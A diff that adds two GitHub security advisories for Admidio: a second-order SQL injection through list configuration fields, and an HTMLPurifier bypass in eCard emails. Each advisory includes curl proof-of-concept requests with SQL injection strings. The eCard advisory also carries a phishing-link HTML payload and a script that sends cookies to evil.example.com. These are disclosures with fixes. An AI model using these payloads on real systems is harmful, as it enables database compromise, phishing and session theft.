github
diff --git a/‎advisories/github-reviewed/2026/03/GHSA-3x67-4c2c-w45m/GHSA-3x67-4c2c-w45m.json‎
Lines changed: 58 additions & 0 deletions b/‎advisories/github-reviewed/2026/03/GHSA-3x67-4c2c-w45m/GHSA-3x67-4c2c-w45m.json‎
Lines changed: 58 additions & 0 deletions
diff --git a/‎advisories/github-reviewed/2026/03/GHSA-4wr4-f2qf-x5wj/GHSA-4wr4-f2qf-x5wj.json‎
Lines changed: 60 additions & 0 deletions b/‎advisories/github-reviewed/2026/03/GHSA-4wr4-f2qf-x5wj/GHSA-4wr4-f2qf-x5wj.json‎
Lines changed: 60 additions & 0 deletions
@@ -0,0 +1,58 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-3x67-4c2c-w45m",
+  "modified": "2026-03-16T21:19:09Z",
+  "published": "2026-03-16T21:19:09Z",
+  "aliases": [],
+  "summary": "Admidio has a Second-Order SQL Injection via List Configuration (lsc_special_field, lsc_sort, lsc_filter)",
+  "details": "## Summary\n\nThe MyList configuration feature in Admidio allows authenticated users to define custom list column layouts. User-supplied column names, sort directions, and filter conditions are stored in the `adm_list_columns` table via prepared statements (safe storage), but are later read back and interpolated directly into dynamically constructed SQL queries without sanitization or parameterization. This is a classic second-order SQL injection: safe write, unsafe read.\n\nAn attacker can inject arbitrary SQL through these stored values to read, modify, or delete any data in the database, potentially achieving full database compromise.\n\n## Details\n\n### Step 1: Storing the Payload (Safe Write)\n\nIn `modules/groups-roles/mylist_function.php` (lines 89-115), user-supplied POST array values for column names, sort directions, and filter conditions are accepted. The only validation on column values is a prefix check (must start with `usr_` or `mem_`). Sort and condition values have no validation at all. These values are stored in the database via `ListConfiguration::addColumn()` which calls `Entity::save()` using prepared statements -- so the INSERT/UPDATE is safe.\n\nKey source file references:\n- `D:\\bugcrowd\\admidio\\repo\\modules\\groups-roles\\mylist_function.php` lines 89-115\n- `D:\\bugcrowd\\admidio\\repo\\src\\Roles\\Entity\\ListConfiguration.php` lines 106-116\n\n### Step 2: Triggering the Payload (Unsafe Read)\n\nWhen the list is viewed (via `lists_show.php`), `ListConfiguration::getSql()` reads the stored values and interpolates them directly into SQL in four locations:\n\n**Injection Point 1 -- lsc_special_field in SELECT clause:**\nFile `D:\\bugcrowd\\admidio\\repo\\src\\Roles\\Entity\\ListConfiguration.php` lines 739-770.\nThe `lsc_special_field` value is read from the database and used as a column name in the SELECT clause. Only three values (`mem_duration`, `mem_begin`, `mem_end`) get special handling; all others fall through to the `default` case where the raw value is used directly as both `$dbColumnName` and `$sqlColumnName`, then interpolated into the SQL as `$dbColumnName AS $sqlColumnName`.\n\n**Injection Point 2 -- lsc_sort in ORDER BY clause:**\nFile `D:\\bugcrowd\\admidio\\repo\\src\\Roles\\Entity\\ListConfiguration.php` lines 790-792.\nThe `lsc_sort` value is appended directly after the column name in the ORDER BY clause.\n\n**Injection Point 3 -- lsc_special_field in search conditions:**\nFile `D:\\bugcrowd\\admidio\\repo\\src\\Roles\\Entity\\ListConfiguration.php` lines 611-621.\nThe `lsc_special_field` value is interpolated into COALESCE() expressions used in search WHERE conditions.\n\n**Injection Point 4 -- lsc_filter via ConditionParser:**\nFile `D:\\bugcrowd\\admidio\\repo\\src\\Roles\\ValueObject\\ConditionParser.php` line 347.\nThe ConditionParser appends raw characters from the stored filter value to the SQL string. A single quote can break out of the SQL string context.\n\n### Root Cause\n\nThe `addColumn()` method and `mylist_function.php` accept arbitrary strings for column names, sort directions, and filter conditions. The only gate for column names is a prefix check (`usr_` or `mem_`), which is trivially satisfied by an attacker (e.g., `usr_id) UNION SELECT ...`). No allowlist of valid column names exists. No server-side validation of sort values exists (should only allow ASC/DESC/empty). The frontend `<select>` element only offers ASC/DESC, but this is trivially bypassed by POSTing arbitrary values.\n\n## PoC\n\n**Prerequisites:** Logged-in user with list edit permission (default: all logged-in users).\n\n**Step 1: Save a list config with SQL injection in lsc_special_field**\n\n```\ncurl -X POST \"https://TARGET/adm_program/modules/groups-roles/mylist_function.php?mode=save_temporary\" \\\n  -H \"Cookie: ADMIDIO_SESSION_ID=<session>\" \\\n  -d \"adm_csrf_token=<csrf_token>\" \\\n  -d \"column[]=usr_login_name\" \\\n  -d \"column[]=usr_id FROM adm_users)--\" \\\n  -d \"sort[]=\" \\\n  -d \"sort[]=\" \\\n  -d \"condition[]=\" \\\n  -d \"condition[]=\" \\\n  -d \"sel_roles[]=<valid_role_uuid>\"\n```\n\nThe second column value `usr_id FROM adm_users)--` starts with `usr_` so it passes the prefix check. When read back in `getSql()`, it is interpolated directly as a column expression in the SQL SELECT clause.\n\n**Step 2: Sort-based injection (simpler, no prefix check needed)**\n\n```\ncurl -X POST \"https://TARGET/adm_program/modules/groups-roles/mylist_function.php?mode=save_temporary\" \\\n  -H \"Cookie: ADMIDIO_SESSION_ID=<session>\" \\\n  -d \"adm_csrf_token=<csrf_token>\" \\\n  -d \"column[]=usr_login_name\" \\\n  -d \"sort[]=ASC,(SELECT+CASE+WHEN+(1=1)+THEN+1+ELSE+1/0+END)\" \\\n  -d \"condition[]=\" \\\n  -d \"sel_roles[]=<valid_role_uuid>\"\n```\n\nThis injects into the ORDER BY clause. The sort value has zero server-side validation.\n\n**Step 3:** The `save_temporary` mode automatically redirects to `lists_show.php` which calls `ListConfiguration::getSql()`, executing the injected SQL.\n\n## Impact\n\n- **Data Exfiltration:** An attacker can extract any data from the database including password hashes, email addresses, personal data of all members, and application configuration.\n- **Data Modification:** With stacked queries (supported by MySQL with PDO), the attacker can modify or delete data.\n- **Privilege Escalation:** Password hashes can be extracted and cracked, or admin accounts can be directly modified.\n- **Full Database Compromise:** The entire database is accessible through this vulnerability.\n\nThe attack requires authentication and CSRF token, but:\n1. Any logged-in user has this permission by default (when `groups_roles_edit_lists = 1`).\n2. The CSRF token is available in the same session.\n3. The injected payload persists in the database and triggers every time anyone views the list.\n\n## Recommended Fix\n\n### Fix 1: Allowlist for lsc_special_field\n\nAdd a strict allowlist of valid special field names before calling `addColumn()` in `mylist_function.php`. The list should match exactly the field names supported in `getSql()` and the JavaScript on `mylist.php`.\n\n### Fix 2: Validate lsc_sort values\n\nIn `ListConfiguration::addColumn()`, validate that the sort parameter is one of ASC, DESC, or empty string before storing it.\n\n### Fix 3: Defense-in-depth validation in ListConfiguration::getSql()\n\nAlso validate the `lsc_special_field` value against an allowlist in `getSql()` before interpolating it into the SQL string. This protects against payloads already stored in the database.\n\n### Fix 4: Escape filter values in ConditionParser\n\nUse parameterized queries or at minimum escape single quotes in `ConditionParser::makeSqlStatement()`.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "admidio/admidio"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "5.0.7"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 5.0.6"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-3x67-4c2c-w45m"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/Admidio/admidio"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-89"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-16T21:19:09Z",
+    "nvd_published_at": null
+  }
+}
@@ -0,0 +1,60 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-4wr4-f2qf-x5wj",
+  "modified": "2026-03-16T21:18:39Z",
+  "published": "2026-03-16T21:18:39Z",
+  "aliases": [
+    "CVE-2026-32757"
+  ],
+  "summary": "Admidio has an HTMLPurifier Bypass in eCard Message Allows HTML Email Injection",
+  "details": "## Summary\n\nThe eCard send handler in Admidio uses the raw `$_POST['ecard_message']` value instead of the HTMLPurifier-sanitized `$formValues['ecard_message']` when constructing the greeting card HTML. This allows an authenticated attacker to inject arbitrary HTML and JavaScript into greeting card emails sent to other members, bypassing the server-side HTMLPurifier sanitization that is properly applied to the `ecard_message` field during form validation.\n\n## Details\n\n### Root Cause\n\nFile: `D:\\bugcrowd\\admidio\\repo\\modules\\photos\\ecard_send.php`\n\nAt line 38, the raw POST value is captured BEFORE form validation runs:\n\n```php\n$postMessage = $_POST['ecard_message'];  // Line 38: RAW value\n```\n\nAt line 61, the form validation runs and properly sanitizes the message through HTMLPurifier (since ecard_message is registered as an editor field):\n\n```php\n$formValues = $photosEcardSendForm->validate($_POST);  // Line 61: sanitized\n```\n\nThe sanitized value is stored in `$formValues['ecard_message']`, but this value is never used. Instead, the raw `$postMessage` is passed to `parseEcardTemplate()` at lines 159 and 201:\n\n```php\n$ecardHtmlData = $funcClass->parseEcardTemplate($imageUrl, $postMessage, ...);  // Line 159\n$ecardHtmlData = $funcClass->parseEcardTemplate($imageUrl, $postMessage, ...);  // Line 201\n```\n\n### Template Injection\n\nFile: `D:\\bugcrowd\\admidio\\repo\\src\\Photos\\ValueObject\\ECard.php`, line 144\n\nThe `parseEcardTemplate()` method places the message directly into the HTML template without any encoding:\n\n```php\n$pregRepArray['/<%ecard_message%>/'] = $ecardMessage;  // Line 144: no encoding\n```\n\nCompare this to the recipient fields which ARE properly encoded:\n\n```php\n$pregRepArray['/<%ecard_reciepient_email%>/'] = SecurityUtils::encodeHTML($recipientEmail);  // Line 135\n$pregRepArray['/<%ecard_reciepient_name%>/']  = SecurityUtils::encodeHTML($recipientName);   // Line 136\n```\n\n### Inconsistency with Preview\n\nFile: `D:\\bugcrowd\\admidio\\repo\\modules\\photos\\ecard_preview.php`, line 56\n\nThe preview correctly uses the sanitized value:\n\n```php\n$smarty->assign('ecardContent', $funcClass->parseEcardTemplate($imageUrl, $formValues['ecard_message'], ...));\n```\n\nThis means the preview shows the sanitized version, but the actual sent email contains the unsanitized content.\n\n### Delivery Mechanism\n\nThe unsanitized HTML is delivered via two channels:\n\n1. **HTML Email** (primary vector): At line 218 of `ECard.php`, the parsed template is set as the email body via `$email->setText($ecardHtmlData)` followed by `$email->setHtmlMail()`. The malicious HTML is rendered by the recipient's email client.\n\n2. **Database Storage**: At line 214 of `ecard_send.php`, `$message->addContent($ecardHtmlData)` stores the raw HTML in the messages table. However, `MessageContent::getValue()` applies `SecurityUtils::encodeHTML()` on output, mitigating the stored XSS in the web interface.\n\n## PoC\n\n**Prerequisites:** Logged-in user with access to the photo module and eCard feature enabled.\n\n**Step 1: Send an eCard with injected HTML**\n\n```\ncurl -X POST \"https://TARGET/adm_program/modules/photos/ecard_send.php\" \\\n  -H \"Cookie: ADMIDIO_SESSION_ID=<session>\" \\\n  -d \"adm_csrf_token=<csrf_token>\" \\\n  -d \"ecard_template=<valid_template.tpl>\" \\\n  -d \"photo_uuid=<valid_photo_uuid>\" \\\n  -d \"photo_nr=1\" \\\n  -d \"ecard_message=<h1>Important Security Update</h1><p>Your account has been compromised. Please <a href='https://evil.example.com/phishing'>verify your identity here</a>.</p><img src='https://evil.example.com/tracking.gif'>\" \\\n  -d \"ecard_recipients[]=<target_user_uuid>\"\n```\n\nThe HTMLPurifier validation runs but its result is discarded. The raw HTML including the phishing link and tracking pixel is sent in the greeting card email.\n\n**Step 2: Escalated payload with script injection**\n\n```\ncurl -X POST \"https://TARGET/adm_program/modules/photos/ecard_send.php\" \\\n  -H \"Cookie: ADMIDIO_SESSION_ID=<session>\" \\\n  -d \"adm_csrf_token=<csrf_token>\" \\\n  -d \"ecard_template=<valid_template.tpl>\" \\\n  -d \"photo_uuid=<valid_photo_uuid>\" \\\n  -d \"photo_nr=1\" \\\n  -d \"ecard_message=<script>document.location='https://evil.example.com/steal?cookie='+document.cookie</script>\" \\\n  -d \"ecard_recipients[]=<target_user_uuid>\"\n```\n\nMost modern email clients block script execution, but older clients or webmail interfaces with relaxed CSP may execute it.\n\n## Impact\n\n- **Phishing via Trusted Sender:** The attacker sends crafted greeting cards that appear to come from the organization's system. The email sender address is the attacker's real address from their Admidio profile, but the email template and branding make it appear legitimate.\n- **HTML Email Injection:** Arbitrary HTML content including fake forms, misleading links, and tracking pixels can be injected into emails sent to any member or role.\n- **Scope Change:** The vulnerability crosses a security boundary -- the attack originates from the Admidio web application but impacts email recipients who may view the content outside of Admidio.\n- **Bypasses Defense-in-Depth:** The HTMLPurifier sanitization is applied but its result is discarded, defeating the intended security control.\n\n## Recommended Fix\n\nIn `ecard_send.php`, use the sanitized `$formValues['ecard_message']` instead of the raw `$_POST['ecard_message']`:\n\n```php\n// Line 38: Remove this line\n// $postMessage = $_POST['ecard_message'];\n\n// After line 61 (form validation), use the sanitized value:\n$formValues = $photosEcardSendForm->validate($_POST);\n$postMessage = $formValues['ecard_message'];\n```\n\nAdditionally, in `ECard::parseEcardTemplate()`, apply encoding to the message placeholder as defense-in-depth, or at minimum document that the message is expected to contain trusted HTML:\n\n```php\n// The message has already been sanitized by HTMLPurifier,\n// so it can safely contain allowed HTML tags\n$pregRepArray['/<%ecard_message%>/'] = $ecardMessage;\n```",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "admidio/admidio"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "5.0.7"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 5.0.6"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-4wr4-f2qf-x5wj"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/Admidio/admidio"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-79"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-16T21:18:39Z",
+    "nvd_published_at": null
+  }
+}